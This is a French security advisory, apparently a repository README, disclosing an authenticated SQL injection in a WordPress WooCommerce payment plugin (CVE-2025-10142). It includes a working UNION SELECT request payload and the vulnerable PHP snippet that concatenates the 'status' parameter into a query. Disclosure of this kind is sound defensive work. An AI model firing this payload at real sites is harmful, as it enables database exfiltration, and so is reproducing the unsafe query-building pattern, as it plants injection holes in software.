
Divulgation pour CVE-2025-10142
Divulgation pour CVE-2025-10142
Ce dépôt divulgue une vulnérabilité découverte dans PagSeguro-Connect-para-WooCommerce <= 4.44.3, un plugin WordPress développé par Ricardo Martins.
| CVE ID | Type | Composant | Impact |
|---|
| CVE-2025-10142 | Injection SQL authentifiée (Shop Manager+) | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | Un attaquant authentifié peut exfiltrer des données |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
Le paramètre status est directement concaténé dans une requête SQL sans échappement ni utilisation de $wpdb->prepare()
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
Comme il peut être attaqué depuis ShopManager, la menace est assez faible. Il a été un peu difficile de suivre le processus consistant à placer l'entrée externe dans $where, puis à insérer directement $where dans la syntaxe SQL.
Nom : MooseLove
Rôle : Chercheur en sécurité indépendant / chasseur de bugs
Contact : Disponible sur demande
Cet avis est fourni pour la sensibilisation à la sécurité publique. Libre de partager avec attribution.